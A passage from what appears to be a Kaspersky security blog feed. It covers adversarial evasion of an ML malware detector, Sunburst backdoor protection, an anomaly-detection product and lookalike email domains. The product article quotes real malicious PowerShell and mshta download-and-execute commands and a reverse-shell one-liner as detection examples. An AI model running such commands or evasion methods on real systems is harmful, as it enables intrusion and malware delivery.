At this point, the question of a “universal section” arises, i.e., a section that, when added to many different files, leads to their incorrect classification and removes detection. Taking a naïve approach, we simply calculated mean statistics over all the sections produced by the adversarial algorithm and created one “mean” section. Unfortunately, adding this section to the malware files removes just 17% of detections.

Byte histogram of “mean” section: for its beginning and ending. X-axis corresponds to the byte value; Y-axis to the number of bytes with this value in the section part

So, the idea of a single universal section failed. We therefore tried to divide the constructed adversarial sections into compact groups (using the l2 metric).

Adversarial sections dendrogram. Y-axis shows the Euclidian distance between sections statistics

Separating the adversarial sections into clusters, we calculated a “mean” section for each of them. However, the detection prevention rate did not increase much: in practice, only 25-30% of detections can be removed by adding such “universal mean sections”.

The dependence of the removed detection share on the number of clusters for “mean” sections computation

The experiments showed that we do not have a “universal” section for making a file look benign for our current version of NN classifier.

Gray-box attack

All previous attacks were made with the assumption that we already have access to the neural network and its weights. In real life, this is not always the case.

In this section we consider a scenario where the ML model is deployed in the cloud (on the security company’s servers), but features are computed and then sent to the cloud from the user’s machine. This is a typical scenario for models in the cybersecurity industry because sending user files to the company side is difficult (due to legal restrictions and traffic limitations), while specifically extracted features are small enough for forwarding. It means that attackers have access to the mechanisms of feature extraction. They can also scan any files using the anti-malware product.

We created a number of new models with different architectures; to be precise, we changed the number of fully connected layers and their sizes in comparison with the original model. We also collected a large set of malware and benign files that were not in the original training set, and extracted features from it (this can be done by reversing the code of the anti-malware application). We then labeled the collection in two different ways: with the full anti-malware scan, and using just the original model’s verdicts. To clarify the difference: with the selected threshold, the original model detects about 60% of the malware files that the full anti-malware stack does. These proxy models were trained on the new dataset. After that, the adversarial attack described in the previous sections was run against the proxy models, and the resulting adversarial samples were tested on the original model. Despite the architectures and training datasets of the original and proxy models being different, it turned out that attacks on a proxy model can produce adversarial samples for the original one. Surprisingly, attacking the proxy model could sometimes even lead to better attack results.

Gray-box attack results compared to white-box attack. Y-axis corresponds to the percentage of malware files with removed detections of the original model. The effectiveness of the gray-box attack in this case is better than that of the white-box attack.

The experiment shows that a gray-box attack can achieve similar results to the white-box approach. The only difference is that more gradient steps are needed.

Attack transferability

We don’t have access to the machine learning models of other security companies, but we do have reports[vi] of gray-box and white-box adversarial attacks succeeding against publicly available models. There are also research papers[vii] about the transferability of adversarial attacks in other domains. Therefore, we presume that the product ML detectors of other companies are also vulnerable to the described attack. Note that neural networks are not the only vulnerable type of machine learning model. For example, another popular machine learning algorithm, gradient boosting, is also reported[viii] to have been subjected to effective adversarial attacks.

Adversarial attack protection

As part of our study, we examined several proposed algorithms for protecting models from adversarial attacks. In this section, we report some of the results of their impact on model protection.

The first approach was described in “Distillation as a defense to adversarial perturbations against deep neural networks“. The authors propose training a new “distilled” model based on the scores of the first model. They show that for some tasks and datasets this method reduces the effectiveness of gradient-based adversarial attacks. Unfortunately, the idea does not guarantee successful model protection; in our case, when we trained a model according to the proposed approach, it still turned out to be easily confused by the adversarial algorithm.

We also tried to add noise to data:

  • For continuous features, we calculated mean and standard deviation values and added a random number of sections to each file during model training. The generated sections’ parameters were drawn from a Gaussian distribution with the aforementioned mean and deviation values.
  • For the bloom filter structure, we also added a 5% chance of setting each bit to 1.

The idea behind this method is to try to expand the set of potential file sections, making the network more stable and resistant to attacks that add sections to the end of a file. However, this method was not effective either.

We also tried the protection approach described in “Detecting adversarial samples from artifacts“. In many cases, neural networks contain a dropout mechanism: a layer that randomly replaces features from the previous layer with zeros. The idea of the paper is to enable dropout in the inference stage (it is usually disabled there, because the dropout mechanism introduces randomness and noise into predictions for the same objects) and calculate the score multiple times for each file. Enabled dropout layers lead to slightly different scores for each run, so we get a score distribution. According to the authors, these distributions have higher standard deviation values for adversarial samples than for normal ones. We tried this approach, computing standard deviations of scores for adversarial malware and for the original malware files. Remarkably, the standard deviations of the adversarial scores did turn out to be significantly higher than the deviations of the initial file scores.

Standard deviation distribution for adversarial and initial sample model scores

By putting a threshold on this difference we can, for example, detect 50% of adversarial samples while misclassifying only around 10% of the original samples.

X-axis shows the share of original samples detected as adversarial; Y-axis shows the share of detected adversarial samples
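A minimal sketch of this dropout-at-inference check (assuming a PyTorch model; the run count is our choice):

    import torch

    def mc_dropout_std(model, x, n_runs=30):
        model.eval()                         # inference mode for everything...
        for m in model.modules():
            if isinstance(m, torch.nn.Dropout):
                m.train()                    # ...except dropout, which stays active
        with torch.no_grad():
            scores = torch.stack([model(x) for _ in range(n_runs)])
        # a high standard deviation suggests an adversarial sample
        return scores.std(dim=0)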

The other approach proposes the use of monotonic networks (see “Monotonic Networks” and “Monotonic models for real-time dynamic malware detection“). The principle behind this method is to create a neural network with positive layer weights and monotonic activation functions. Such models are, by design, resistant to the addition of new sections and strings: any addition can only increase the model’s detection score, making the attack described in this article impracticable.
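A minimal sketch of the idea (our own illustration, not the product model): reparameterizing the weights through softplus keeps them positive, and combined with a monotonic activation such as ReLU, the network output can only grow as inputs grow, so added sections or strings can only raise the score.

    import torch
    import torch.nn.functional as F

    class MonotonicLinear(torch.nn.Linear):
        # weights pass through softplus, so the effective weights are always positive
        def forward(self, x):
            return F.linear(x, F.softplus(self.weight), self.bias)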

Adversarial attack difficulties in the real world

Currently, there is no approach in the field of machine learning that can protect against all the various adversarial attacks, meaning methods that rely heavily on ML predictions are vulnerable. Kaspersky’s anti-malware solution provides a complex multi-layered approach. It contains not only machine learning techniques but a number of different components and technologies to detect malicious files. First, detection relies on different types of features: static, dynamic or even cloud statistics. Complex detection rules and diverse machine learning models are also used to improve the quality of our products. Finally, complex and ambiguous cases go to the virus analysts for further investigation. Thus, confusion in the machine learning model will not, by itself, lead to misclassification of malware for our products. Nevertheless, we continue to conduct research to protect our ML models from existing and prospective attacks and vulnerabilities.

[i] Goodfellow, Ian J., Jonathon Shlens, and Christian Szegedy. “Explaining and harnessing adversarial examples.” arXiv preprint arXiv:1412.6572 (2014).

[ii] Brown, Tom B., et al. “Adversarial patch.” arXiv preprint arXiv:1712.09665 (2017).

[iii]  Demetrio, Luca, et al. “Functionality-preserving black-box optimization of adversarial windows malware.” IEEE Transactions on Information Forensics and Security (2021).

[iv] Sharif, Mahmood, et al. “Optimization-guided binary diversification to mislead neural networks for malware detection.” arXiv preprint arXiv:1912.09064 (2019).

[v] Kolosnjaji, Bojan, et al. “Adversarial malware binaries: Evading deep learning for malware detection in executables.” 2018 26th European signal processing conference (EUSIPCO). IEEE, 2018;

Kreuk, Felix, et al. “Deceiving end-to-end deep learning malware detectors using adversarial examples.” arXiv preprint arXiv:1802.04528 (2018).

[vi] Park, Daniel, and Bülent Yener. “A survey on practical adversarial examples for malware classifiers.” arXiv preprint arXiv:2011.05973 (2020).

[vii] Liu, Yanpei, et al. “Delving into transferable adversarial examples and black-box attacks.” arXiv preprint arXiv:1611.02770 (2016).

Tramèr, Florian, et al. “The space of transferable adversarial examples.” arXiv preprint arXiv:1704.03453 (2017).

[viii] Chen, Hongge, et al. “Robust decision trees against adversarial examples.” International Conference on Machine Learning. PMLR, 2019.

Zhang, Chong, Huan Zhang, and Cho-Jui Hsieh. “An efficient adversarial attack for tree ensembles.” arXiv preprint arXiv:2010.11598 (2020).

How we protect our users against the Sunburst backdoor
https://securelist.com/how-we-protect-against-sunburst-backdoor/99959/
Wed, 23 Dec 2020

What happened

SolarWinds, a well-known IT managed services provider, has recently become a victim of a cyberattack. Their product Orion Platform, a solution for monitoring and managing their customers’ IT infrastructure, was compromised by threat actors. This resulted in the deployment of a custom Sunburst backdoor on the networks of more than 18,000 SolarWinds customers, with many large corporations and government entities among the victims.

According to our Threat Intelligence data, the victims of this sophisticated supply-chain attack were located all around the globe: the Americas, Europe, Middle East, Africa and Asia.

After the initial compromise, the attackers appear to have chosen the most valuable targets among their victims. The companies that appeared to be of special interest to the malicious actors may have been subjected to deployment of additional persistent malware.

Overall, the evidence available to date suggests that the SolarWinds supply-chain attack was designed in a professional manner. The perpetrators behind the attack made it a priority to stay undetected for as long as possible: after the installation, the Sunburst malware lies dormant for an extended period of time, keeping a low profile and thwarting automated sandbox-type analysis and detection. Additionally, the backdoor utilizes a sophisticated scheme for victim reporting, validation and upgrading which resembles methods involved in some other notorious supply-chain attacks.

Read more about our research on Sunburst malware here. Additional reports and indicators of compromise are available to our Threat Intelligence Portal customers.

How to protect your organization against this threat

The detection logic has been improved in all our solutions to ensure that our customers remain protected. We continue to investigate this attack using our Threat Intelligence, and we will add further detection logic as required.

Our products protect against this threat and detect it with the following names:

  • Backdoor.MSIL.Sunburst.a
  • Backdoor.MSIL.Sunburst.b
  • HEUR:Trojan.MSIL.Sunburst.gen
  • HEUR:Backdoor.MSIL.Sunburst.gen

Screenshot of our TIP portal with one of the IoCs from the SolarWinds breach

Our Behavior Detection component detects activity of the trojanized library as PDM:Trojan.Win32.Generic.

Our Endpoint Detection and Response (Expert) platform can be helpful in looking for and identifying traces of this attack. The customer can search for Indicators of Compromise (such as hashes or domain names) with an .ioc file or directly with the Threat Hunting interface:

Or, customers can use the IoA Tag, which we have added specifically for this attack:

This rule marks endpoint detections for Sunburst to make it more clearly visible to security officers:

Our Kaspersky Anti-Targeted Attack Platform detects Sunburst traffic with a set of IDS rules with the following verdicts:

  • Trojan.Sunburst.HTTP.C&C
  • Backdoor.Sunburst.SSL.C&C
  • Backdoor.Sunburst.HTTP.C&C
  • Backdoor.Sunburst.UDP.C&C
  • Backdoor.Beacon.SSL.C&C
  • Backdoor.Beacon.HTTP.C&C
  • Backdoor.Beacon.UDP.C&C

Our Managed Detection and Response service is also able to identify and stop this attack by using threat hunting rules to spot various activities that can be performed by the Sunburst backdoor as well as detections from Kaspersky Endpoint Security.

Sunburst / UNC2452 / DarkHalo FAQ

  1. Who is behind this attack? I read that some people say APT29/Dukes?
    At the moment, there are no technical links with previous attacks, so it may be an entirely new actor, or a previously known one that evolved their TTPs and opsec to the point where they can’t be linked anymore. Volexity, who previously worked on other incidents related to this, named the actor DarkHalo. FireEye named them “UNC2452”, suggesting an unknown actor. While some media sources linked this with APT29/Dukes, this appears to be either speculation or based on some other, unavailable data, or weak TTPs such as legitimate domain re-use.
  2. I use Orion IT! Was I a target of this attack?
    First of all, we recommend scanning your system with an updated security suite capable of detecting the compromised packages from SolarWinds. Check your network traffic for all the publicly known IOCs – see https://github.com/fireeye/sunburst_countermeasures. The fact that an organization downloaded the trojanized packages doesn't necessarily mean it was selected as a target of interest and received further malware, or suffered data exfiltration. It would appear, based on our observations and common sense, that only a handful of the 18,000 Orion IT customers were flagged by the attackers as interesting and were further exploited.
  3. Was this just espionage or did you observe destructive activities, such as ransomware?
    While the vast majority of the high-profile incidents nowadays include ransomware or some sort of destructive payload (see NotPetya, Wannacry) in this case, it would appear the main goal was espionage. The attackers showed a deep understanding and knowledge of Office365, Azure, Exchange, Powershell and leveraged it in many creative ways to constantly monitor and extract e-mails from their true victims’ systems.
  4. How many victims have been identified?
    Several publicly available data sets, such as the one from John Bambenek, include DNS requests encoding the victim names. It should be noted that these victim names are just the “first stage” recipients, not necessarily the ones the attackers deemed interesting. For instance, out of the ~100 Kaspersky users with the trojanized package, it would appear that none were interesting to the attackers to receive the 2nd stage of the attack.
  5. What are the most affected countries?
    To date, we observed users with the trojanized Orion IT package in 17 countries. However, the total number is likely to be larger, considering the official numbers from SolarWinds.
  6. Why are you calling this an attack, when it’s just exploitation? (CNA vs CNE)
    Sorry for the terminology, we simply refer to it as a “supply chain attack”. It would be odd to describe it as a “supply chain exploitation”.
  7. Out of the 18,000 first stage victims, how many were interesting to the attackers?
    This is difficult to estimate, mostly because of the lack of visibility and because the attackers were really careful in hiding their traces. Based on the CNAME records published by FireEye, we identified only two entities, a US government organization and a telecommunications company, who were tagged and “promoted” to dedicated C2s for additional exploitation.
  8. Why didn’t you catch this supply chain attack in the first place?
    That's a good question! In particular, two things made it really stealthy. The slow communication method, in which the malware lies dormant for up to two weeks, is one of them. The other is the lack of x86 shellcode; the attackers used an injected .NET module. Last but not least, there was no significant change in the file size of the module when the malicious code was added. In 2019, we observed two suspicious modules in which SolarWinds.Orion.Core.BusinessLayer.dll jumped from the usual 500k to 900k. When the malicious code was first added, in February 2020, the file size didn't change in any significant manner. If the attackers did this on purpose, to avoid future detections, then it's a pretty impressive thing.
  9. What is Teardrop?
    According to FireEye, Teardrop is malware delivered by the attackers to some of the victims. It is an unknown memory-only dropper suspected to deliver a customized version of the well-known CobaltStrike BEACON. To date, we haven’t detected any Teardrop samples anywhere.
  10. What made this such a successful operation?
    Probably, a combination of things – a supply chain attack, coupled with a very well thought first stage implant, careful victim selection strategies and last but not least, no obvious connections to any previously observed TTPs.
Adaptive protection against invisible threats https://securelist.com/adaptive-protection-against-invisible-threats/99772/ https://securelist.com/adaptive-protection-against-invisible-threats/99772/#respond Mon, 14 Dec 2020 12:00:59 +0000 https://kasperskycontenthub.com/securelist/?p=99772

Corporate endpoint security technologies for mid-sized companies struggle to surprise us with anything brand new. They provide reliable protection against malware and, when combined with relevant policies, regular updates, and employee cyberhygiene, they can shield a business from a majority of cyber-risks. For some, it may seem like you do not need more security than this… But is that really the case?

The answer, in short, is no. In fact, in most medium-sized companies’ cybersecurity strategies, even with an endpoint solution, there are likely to still be gaps that can and should be closed. In this article, we look at what those gaps are and how to fill them.

Legitimate software can hide risks

Detecting an exploit or trojan that explicitly runs on a device is not a problem for an antivirus solution. But when a malicious script is launched through a legitimate application, this can be a challenge. For example, when a document from a phishing email is opened in Microsoft Office, all malicious actions are performed by the office application.

Such authorized software is often used on a large number of devices, and it is not feasible to simply ban access to it. Antivirus solutions will also recognize these files as "trusted", so they may be unable to quickly "understand" that the piece of office software is executing atypical processes initiated by malicious code. Moreover, such activity can sometimes be started by administrators themselves as part of system maintenance: for example, the "trusted" Windows Management Instrumentation (WMI) engine on a remote machine can be used for deployment purposes. This further complicates the threat detection process.

What it can lead to: fileless malware, insider threats, miners and ransomware

A downloader is one type of malware that uses this legitimate software cover. It does not itself perform any direct malicious actions on the device. Instead, it gets onto the machine, for example, through a phishing email, and then independently downloads the real malicious code.

There is a specific type of malware – fileless malware – that is often used as a downloader. It does not store itself on the hard disk, so tracking it with an ordinary antivirus solution is not easy. Because of that, fileless malware is often used in advanced targeted attacks, such as those of the Platinum APT, whose victims were state and diplomatic organizations. Another example is the advanced PowerGhost cryptominer, which used trusted software for cryptocurrency mining. According to Kaspersky statistics, of all the anomalous activity detected in legitimate Windows Management Instrumentation (WMI) processes, two-thirds (67%) consisted of fileless downloaders of the Emotet banking trojan and the WannaMine cryptominer. WMI on remote machines is often used by malware for lateral movement.

Malware families running in WMI (download)

Now, some might think that simply tightening policies and scaling down user privileges is the way to stop the malware from starting any process on the device. However, this is not an option, because fileless malware does not need administrator privileges to perform its malicious actions.

Another possible risk of authorized software exploitation occurs when malicious activity is initiated by someone on the network. If the company is lucky, it is just an employee who decided to mine coins using the corporate computing power. But in this case, since the actions are performed by a trusted user, administrators or a security solution may not be able to detect them.

Finally, some forms of malware can use legitimate processes to disguise themselves (svchost.exe, for example), which makes them more difficult to detect manually by IT security teams.

What can help? You need Little Red Riding Hood 2.0, who detects the wolf through external signs and calls lumberjacks before being eaten

To eliminate these threats, IT security teams need technology that allows them to detect any suspicious application activity from a corporate cybersecurity perspective. Spotting anomalies in trusted software helps to identify threats at the very early stages, when the malware is already on the device but before the antivirus reacts to it. This technology, developed by Kaspersky, is called Adaptive Anomaly Control.

To make anomaly detection work, several problems need to be solved. First, how does Adaptive Anomaly Control know which activity is abnormal and which is not? Second, if the control notifies an administrator about each deviation, many of the notifications will most likely turn out to be false positives for scripts launched as part of a workflow. In that situation, the user will immediately want to disable the control.

To resolve that, the technology should first be "trained" to recognize how applications work and what actions are performed regularly by employees as part of their job responsibilities. This minimizes the number of false positives and keeps administrators from going crazy. And, most importantly, when Adaptive Anomaly Control notifies the IT security manager about suspicious activity, it provides enough context for them to understand when action needs to be taken immediately. Thus, the technology turns from "the boy who cried wolf" into an advanced version of Little Red Riding Hood, who manages to recognize the wolf in the guise of her grandmother early on and call the lumberjacks for help before she gets eaten.

How Adaptive Anomaly Control works

Adaptive Anomaly Control works on the basis of rules, statistics and exceptions. Rules cover three groups of programs: office programs, Windows Management Instrumentation, and script engines and frameworks, as well as the abnormal program activity category. The rules are already developed in the product, so there is no need to write them manually.

List of rules for office applications

To start with, Adaptive Anomaly Control has training mode activated for about two weeks. During this time, it monitors the network and collects statistics on application usage. Technically, Adaptive Anomaly Control mostly analyzes process-creation actions: for example, the command line of a new process, the file path and name of the executable, and also the calling stack can be analyzed to determine an anomaly. The technology marks regular anomalies, which indicate that processes are started by employees for work purposes. Based on the data received, it then creates exceptions to the rules. If administrators use scripts that could potentially trigger the rules, they can create exceptions before turning on the component, which improves the quality of the training process.
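
To make this concrete, here is a toy Python sketch of a rule-plus-exclusions check over process-creation events, in the spirit of what is described above. The rule names, event fields and exclusion format are our own illustrative assumptions, not the product's internal representation.

from dataclasses import dataclass

@dataclass
class ProcessEvent:
    parent: str    # image name of the process that spawned this one
    image: str     # full path of the newly created executable
    cmdline: str   # command line of the new process
    user: str

# Each rule flags an atypical parent/child pair, e.g. an office
# application spawning a script host or command interpreter.
RULES = {
    "office_spawns_shell": lambda e: e.parent in ("winword.exe", "excel.exe")
        and e.image.lower().rsplit("\\", 1)[-1] in ("powershell.exe", "cmd.exe", "mshta.exe"),
    "wmi_spawns_powershell": lambda e: e.parent == "wmiprvse.exe"
        and "powershell" in e.image.lower(),
}

# Exclusions learned during the training period: (rule, user, command-line prefix).
EXCLUSIONS = {("wmi_spawns_powershell", "svc_deploy", "powershell -file c:\\ops\\inventory.ps1")}

def check(event):
    for name, rule in RULES.items():
        if rule(event) and not any(r == name and u == event.user and
                                   event.cmdline.lower().startswith(p)
                                   for r, u, p in EXCLUSIONS):
            return name   # anomaly: block and report to the administrator
    return None           # regular activity learned during training

print(check(ProcessEvent("winword.exe", r"C:\Windows\System32\mshta.exe",
                         "mshta http://example.invalid/x", "accountant")))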

The training period not only avoids false positives, it also helps to catch important anomalies. If a false positive occurs within a rule, administrators can choose not to apply an exception across the entire network, but instead to configure one for just the particular script that triggered the rule. This mitigates the risk of a global exception that would make the component useless.

The policies can be tuned for different groups of users individually and inherited as part of user profiles. For example, financial department employees would never legitimately need to execute JavaScript, but the development team will. Therefore, for the software development department, some rules may be disabled or provided with numerous exceptions, while for the financial department, they may be turned on. Adaptive Anomaly Control identifies the user group in which the rule is triggered to block or allow execution accordingly.

Adding an exclusion for a user or group

After the training period, when Adaptive Anomaly Control enters combat mode, the component notifies the IT security manager about any anomalies outside of the exceptions specified during the training period. It provides information for investigation, such as what processes triggered the operations, on what computers and under what users.

Example of anomalous activity by Microsoft Word and possible actions

For example, a PowerShell script trying to start a Windows Command Processor, HTML Application Host, or Register Server from office software may be considered suspicious. Launching these activities is technically possible but not typical of regular operation. Let us focus on some real-life examples which the Adaptive Anomaly Control component detects. Fin7 spear-phishing campaigns have included malicious Word documents with DDE execution of PowerShell code, which were detected and blocked (doc MD5: 2C0CFDC5B5653CB3E8B0F8EEEF55FC32).

Fin7 document with DDE execution

Command-line code from inside a document:

powershell  -C ;echo "https://sec[.]gov/";IEX((new-object net.webclient).downloadstring('https[:]//trt.doe.louisiana[.]gov/fonts.txt'))

Another example is LokiBot's downloader, which was also started from within office software (doc MD5: 2151D178B6C849E4DDB08E5016A38A9A):

mshta http[:]//%20%20@j[.]mp/asdaaskdasdjijasdiodkaos

Adaptive Anomaly Control also detects suspicious drop attempts by office applications. For example, a Qbot document-dropped payload was detected: C:\Arunes\caemyuta\Polaser.exe (doc MD5: 3823617AB2599270A5D10B1331D775FE). Another example of a detected dropper is this Cymulate Framework document activity: %tmp%\c0de203103ce5f0a5463e324c1863eb1_CymulateNativeReverseShell.exe (exe MD5: D8DBF8C20E8EA57796008D0F59104042).

Similarly, with Windows Management Instrumentation, Adaptive Anomaly Control may react if HTML Application Host or a PowerShell script is launched from WMI. In addition, according to Kaspersky research, most malicious activity (62%) is detected in the WMI group. WMI is a common tool among malware developers because of its convenience. It allows for easy starting of PowerShell code and performs a wide range of actions, such as system intelligence collection.

The number of unique users attacked, by detection group (download)

For example, the Silent Break Security framework was detected during lateral movement using WMI, which ran this inline PowerShell code:

powershell -NoP -NonI -W Hidden -C "$pnm='57wXU7nxLgCRzFJ1q';$enk='cX6MKM670IO+B5YCcnL8RWbc27WOIIdNxhq45TAcCdI=';sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('vTxt...<SKIPPED LONG BASE64 STRING>...yULif/Pj/'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()"

Such cryptominers as WannaMine and KingMiner also use WMI for spreading across networks. Below, you can see their command-line code that triggered detection:

powershell.exe -NoP -NonI -W Hidden "if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64')){IEX(New-Object Net.WebClient).DownloadString('http[:]//safe.dashabi[.]nl:80/networks.ps1')}else{IEX(New-Object Net.WebClient).DownloadString('http[:]//safe.dashabi[.]nl:80/netstat.ps1')}"

mshta.exe vbscript:GetObject("script:http[:]//165233.1eaba4fdae[.]com/r1.txt")(window.close)

In the group of script engines and frameworks, activities such as running dynamic or obfuscated code may be suspicious. For example, LemonDuck’s fileless downloader was detected during lateral movement:

IEX(New-Object Net.WebClient).DownloadString('http[:]//t.amynx[.]com/gim.jsp')

Originally, it was a base64-encoded inline PowerShell script. The decoded version is shown here for convenience.

Another example in the group of script engines is Clipbanker’s scheduled task command line, also originally a base64-encoded inline PowerShell script:

iex $(Get-ItemProperty -Path HKCU:\Software -Name kumi -ErrorAction Stop).kumi

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell code for offensive security, penetration testing and red teaming. An example of a detected fileless PowerShell backdoor:

$sm=(New-Object Net.Sockets.TCPClient(`XX.XX.XX.XX`,9999)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

As part of the abnormal program activity category, files with anomalous names or locations are tracked: for example, a third-party program which has the name of a system file but is not stored in the system folder. Suspicious files inside system directories are also tracked: for example, a ShadowPad backdoor was started inside a system folder: C:\windows\debug\srv.exe (DLL hijacking used, dll MD5: CC2F7D7CA76A5223E936570A076B39B8). Adaptive Anomaly Control detects such activity. Another detected example is a Swisyn backdoor at: C:\windows\system\explorer.exe (MD5: 8E0B4BC934519400B872F9BAD8D2E9C6). The botnet Mirai also places its parts in a system folder and gets detected: C:\windows\system\backs.bat (MD5: 7F70B9755911B0CDCFC1EBC56B310B65).
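
A toy version of that location check might look like the sketch below; the name-to-folder map is illustrative and far from complete.

EXPECTED_LOCATION = {                      # illustrative, far from complete
    "explorer.exe": r"c:\windows",
    "svchost.exe":  r"c:\windows\system32",
    "lsass.exe":    r"c:\windows\system32",
}

def is_suspicious(image_path):
    folder, _, name = image_path.lower().rpartition("\\")
    expected = EXPECTED_LOCATION.get(name)
    # a system-named binary running outside its expected folder is anomalous
    return expected is not None and folder != expected

print(is_suspicious(r"C:\windows\system\explorer.exe"))   # True, cf. Swisyn above
print(is_suspicious(r"C:\windows\system32\lsass.exe"))    # False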

A detailed log of Adaptive Anomaly Control rules applied to various user groups

“Process action blocked” notification

The Adaptive Anomaly Control algorithm shows how the decision-making process is performed during the training period. If a rule was not triggered at all during training, the technology will consider the actions associated with this rule suspicious and block them. If a rule was triggered, an administrator receives a report and decides what the technology should do: block the process, or allow it and notify the user. Another option is to extend the training to further monitor the way the rule is working. If the user does not take any action, the control will continue to work in smart training mode and the training mode time limit is reset.

Adaptive Anomaly Control training algorithm
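
The same logic, condensed into a small Python sketch (the verdict names and parameters are assumptions made for illustration, not the product's interface):

def post_training_verdict(rule_triggered_during_training, admin_decision=None):
    """Toy model of the decision flow from the diagram above."""
    if not rule_triggered_during_training:
        return "block"             # never seen legitimately: treat as suspicious
    if admin_decision in ("block", "allow_and_notify", "extend_training"):
        return admin_decision      # the administrator reviewed the report
    return "smart_training"        # no decision: keep training, reset the time limit

print(post_training_verdict(False))                     # -> block
print(post_training_verdict(True, "allow_and_notify"))  # -> allow_and_notify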

If this technology is so effective, then what are all the other protection features needed for?

Adaptive Anomaly Control solves the specific task of early threat detection, and it does so automatically, requiring no special administration skills or proactive measures. Note that it detects not the malware itself, but its delivery to the network, potentially dangerous actions launched by an insider, or the malicious activity of programs that have "not a virus" status. It is always easier to treat a disease at an early stage, so early detection of threats helps to get rid of them faster, with less workload on the IT and information security departments.

However, it is equally important to use the entire range of protective measures, including signature-based malware detection, behavioral analysis, vulnerability detection and patch management, and exploit prevention. These technologies help to block most generic attacks, which means that advanced protection mechanisms such as Adaptive Anomaly Control are freed up to detect the really complex, evasive threats. Adaptive Anomaly Control covers this specific risky area and is effective in that role, while other endpoint technologies address their respective areas of expertise. Together, the complete cybersecurity solution is efficient enough to protect the business from cyberthreats.

Lookalike domains and how to outfox them https://securelist.com/lookalike-domains-and-how-to-outfox-them/99539/ https://securelist.com/lookalike-domains-and-how-to-outfox-them/99539/#respond Tue, 24 Nov 2020 10:00:59 +0000 https://kasperskycontenthub.com/securelist/?p=99539

Our colleagues already delved into how cybercriminals attack companies through compromised email addresses of employees, and how to protect against such attacks using SPF, DKIM and DMARC technologies. But despite the obvious pluses of these solutions, there is a way to bypass them that we want to discuss.

But let’s start from a different angle: how relevant is email these days? After all, this year saw a sharp rise in the popularity of video-conferencing tools, preceded by several years of healthy growth in the use of instant messengers, in particular, WhatsApp and Telegram. Nevertheless, email is still the main means of online communication, at least in the business world. Indirect confirmation of this is the increase in the number and quality of Business Email Compromise (BEC) attacks. According to data from the US Internet Crime Complaint Center (IC3), the financial damage from such attacks has risen sevenfold in the past five years.

Financial damage from BEC attacks, 2015–2019 (download)

Data for 2020 has not yet been published, but given the COVID-19 pandemic and the mass shift of employees to remote working, it is safe to assume that the number of BEC attacks will only grow. Initial threat landscape studies also point to this.

Lookalike domains in BEC

A feature of BEC is the emphasis not on the technical side (cybercriminals’ options are rather limited when it comes to email), but on social engineering. Typically, attacks of this kind combine technical and social techniques to achieve greater efficiency. The three protection technologies mentioned above cope with most combinations well enough. But there is one exception: lookalike-domain attacks. The method is simple in essence: the cybercriminals register a domain that looks very similar to that of the target company or a partner firm. Messages sent from this domain sail through Sender Policy Framework (SPF) authentication, possess a DomainKeys Identified Mail (DKIM) cryptographic signature, and generally do not arouse the suspicions of security systems. The snag is that these emails are phishing. And if written believably enough — with a corporate template, stressing the urgency of the matter, etc. — they will likely fool the victim.

Here are some examples of fake domain names:

Original domain      Fake domain
netflix.com          netffix.com
kaspersky.com        kapersky.com
uralairlines.ru      uralairilnes.ru

As you can see, the fake differs from the original by only one letter added (or removed) so that a closer look is required to spot it.
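
To make the idea concrete, here is a minimal sketch of flagging such near-duplicates automatically using only Python's standard library; the protected-domain list and the 0.9 threshold are illustrative assumptions, not values from any real product.

from difflib import SequenceMatcher

PROTECTED = ["netflix.com", "kaspersky.com", "uralairlines.ru"]

def lookalike_of(sender_domain, threshold=0.9):
    for legit in PROTECTED:
        if sender_domain == legit:
            return None        # exact match: a legitimate sender
        if SequenceMatcher(None, sender_domain, legit).ratio() >= threshold:
            return legit       # one-letter edits score roughly 0.9-0.96 here
    return None

print(lookalike_of("kapersky.com"))   # -> kaspersky.com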

For an overview of the use of fake domains, we compiled statistics on lookalike spoofing for Q3 2020. Having analyzed the data, we concluded that this year’s pandemic has significantly changed the direction of cybercriminal activity. Whereas before, the focus of such attacks was the financial sector, now the service sector is in the firing line, including various e-commerce services: food delivery, online shopping, buying air tickets, etc. Domains related to this sector accounted for 34.7% of the total number of attacks in Q3.

Distribution of detected lookalike domains by category, Q3 2020 (download)

Also note the rise in the IT sector’s share in 2020: up from 17.9% in Q1 to 22.2% in Q3. This is to be expected, since the mass transition to remote working was bound to impact the overall situation.

A word about lookalikes

Unlike spam mailings, which tend to be large in both scale and duration, attacks involving lookalike domains, like any BEC attack, target a specific victim (or group of victims). Consequently, emails are few and well thought out, and the domains are extremely short-lived. We see that half of all fake domains are used only once, and in 73% of cases the domain is active for just one day. This renders traditional signature-based anti-spam solutions (detect an attack, create a rule) effectively useless, so the need arises for proactive protection. There are two common and at the same time simple methods available to companies keen to guard, at least in some measure, against lookalike and other such attacks.

The first is for the company itself to register domains with typos, and set up redirects to its official domain. This reduces cybercriminals’ ability to register a plausible fake, but does not nullify it completely or prevent counterfeiting of domains belonging to partners, contractors and other organizations which the company deals with.

The second is to compile lists of plausible fake names for both the company’s domain and those of partners and contractors. Next, the list is loaded into the anti-spam solution, which preemptively blocks all messages arriving from the fakes. The main drawback of this method is the same as before: it is impossible to cover all possible fake domains, especially if the company works with many counterparties. Plus, there is the ever-present human factor — one typo in the list of tens or hundreds of domain names can lead to a security breach or the filtering out of emails from a legitimate domain instead of a fake one, causing additional headaches for business units.
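
As a rough illustration of how such a list of plausible fakes can be generated, the sketch below enumerates one-edit variants of a domain; the three mutation classes shown are assumptions and far from exhaustive.

def typo_variants(domain):
    name, _, tld = domain.rpartition(".")
    variants = set()
    for i in range(len(name)):
        variants.add(name[:i] + name[i + 1:] + "." + tld)                # drop a letter
        variants.add(name[:i] + name[i] * 2 + name[i + 1:] + "." + tld)  # double a letter
        if i + 1 < len(name):
            variants.add(name[:i] + name[i + 1] + name[i] + name[i + 2:] + "." + tld)  # swap neighbors
    variants.discard(domain)
    return sorted(variants)

print(typo_variants("kaspersky.com")[:3])   # first few of a few dozen candidates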

